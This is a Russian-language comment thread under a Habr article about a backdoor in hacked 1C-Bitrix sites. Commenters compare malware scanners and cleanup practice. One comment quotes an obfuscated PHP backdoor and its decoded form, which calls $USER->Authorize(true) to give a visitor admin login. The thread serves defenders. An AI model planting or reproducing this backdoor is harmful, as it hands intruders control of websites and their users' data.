v_k
28.02.2021 23:34
#22747150
Добавил сигнатуру в свой сканнер AWA — www.avirlab.com
1. evgeniymx Автор
  01.03.2021 01:37
  #22747466
  Я рад что данная информация была полезной!

istepan
01.03.2021 08:55
#22747970
Раньше был популярен aibolit для поиска бэкдоров.

Что сейчас используют из opensource решений?
1. mSnus
  01.03.2021 09:15
  #22748020
  habr.com/ru/post/543906
  github.com/mSnus/simple-virus-scanner
  
  Надо будет посмотреть на aibolit, спасибо!
1. evgeniymx Автор
  01.03.2021 11:26
  #22748564
  Айболит всё, они ушли под крыло cloudlinux, а точнее их отдела imunify (revisium продался, так сказать)
  1. istepan
    01.03.2021 11:48
    #22748698
    Очень жаль. Весьма мощное было решение.
    
    m0ze
    04.03.2021 03:57
    #22762476
    В какой вселенной это чудо было мощным? Единственный более-менее полезный режим — параноидальный, да и то он выдавал вагон ложных срабатываний и пропускал два вагона вредоносного кода.
    
    istepan
    04.03.2021 07:35
    #22762636
    А какой из текущих инструментов по вашему действительно мощный?
    Периодически появляется надобность, но нет времени искать и выбирать. Буду признателен за совет.
    
    m0ze
    04.03.2021 12:42
    #22763944
    Я уже пару лет как забросил поиски подобного инструмента — они все отстают на шаг, а то и на два от современных угроз. В итоге, каким бы банальным не звучало, но решение остаётся за личным опытом, усидчивостью, ну и для подстраховки можно использовать какие-то инструменты в связке. Опыт и усидчивость — чтобы не полениться и найти все возможные куски вредоносного кода, деобфусцировать их и понять что код делает, далее плясать уже от этого. Связка каких-то сторонних инструментов: антивирус, скрипт поиска всяких
    base64_
    и прочей банальщины, автоматизация процесса через командную строку — короче, кому что удобнее и что эффективнее, но только в роли вспомогательных инструментов.
    
    Если времени нет, а результат нужен, тогда проще делать откат по актуальному бэкапу, искать и закрывать уязвимость(-и).
    
    Плюс, обратите внимание, что знание той системы, которая подверглась атаке, значительно экономит время. Даже в этой заметке, в комментариях к которой мы общаемся, проскочил нюанс: зачастую для атаки используются легитимные функции/процессы системы, которые приводят к печальным последствиям. Тот же
    Authorize(1)
    существует очень давно — это закладка фрилансеров #1 под Битрикс, но далеко не все о ней знают (хотя, казалось бы, да..?). В комментариях выше пишут, что взяли себе на вооружение, кто-то даже в базу добавил в своих самописных скриптах (к вопросу об отставании на шаг-другой от угроз).

zelsystem
01.03.2021 11:26
#22748558
+1
Народ, у меня сегодня случилось тоже самое на лицензионном битриксе. Прям ровно тоже что и на скрине. Битрикс 20 версии. Сейчас тоже анализируем логи, но похоже что всё-таки на бекдор.
1. evgeniymx Автор
  01.03.2021 11:28
  #22748576
  20 версия версии рознь. Надо видеть полную версию, там очень много зависит от минорных
1. infusion_framed
  04.03.2021 11:53
  #22763652
  Битрикс тут не причём, конечно, если он лицензионный, и с ним работал сертифицированный программист.
  Смотри соседние сайты, скрипты, в которых описана загрузка файлов и особенно старые сайты или сайты с самописными cms
  1. evgeniymx Автор
    04.03.2021 11:53
    #22763654
    Сайты с самописными CMS взлому подвержены минимально, только если там совсем очевидных дыр. Говорю как разработчик сайтов на таких решениях.

xRay

02.03.2021 10:45

#22753044

Как-то сталкивался с подобным, но там не по Authorize(1) было а вот так Authorize(true)

Сам код был в таком виде:

<? $a =$_SERVER["DOCUMENT_ROOT"]; $b =$a.base64_decode ("L2JpdHJpeC9tb2R1bGVzL21haW4vaW5jbHVkZS8="); require($b.base64_decode("cHJvbG9nX2JlZm9yZS5waHA="));
$c = strrev("tuA").substr(strrev("ParBzirohMSlow"),5,round(0.00587544*851,0))."e"; global $USER; $USER->$c(true);require($b.base64_decode("ZXBpbG9nX2FmdGVyLnBocA=="));?>
<?require($a.base64_decode ("L2JpdHJpeC9mb290ZXIucGhw"));?>

После декодировки:

require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");
global $USER; $USER->Authorize(true);
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php");
require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");

Бэкдор во взломанном 1С-Битрикс: под угрозой сотни сайтов +8

Почему не только лишь все?

Комментарии (119)

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор

evgeniymx Автор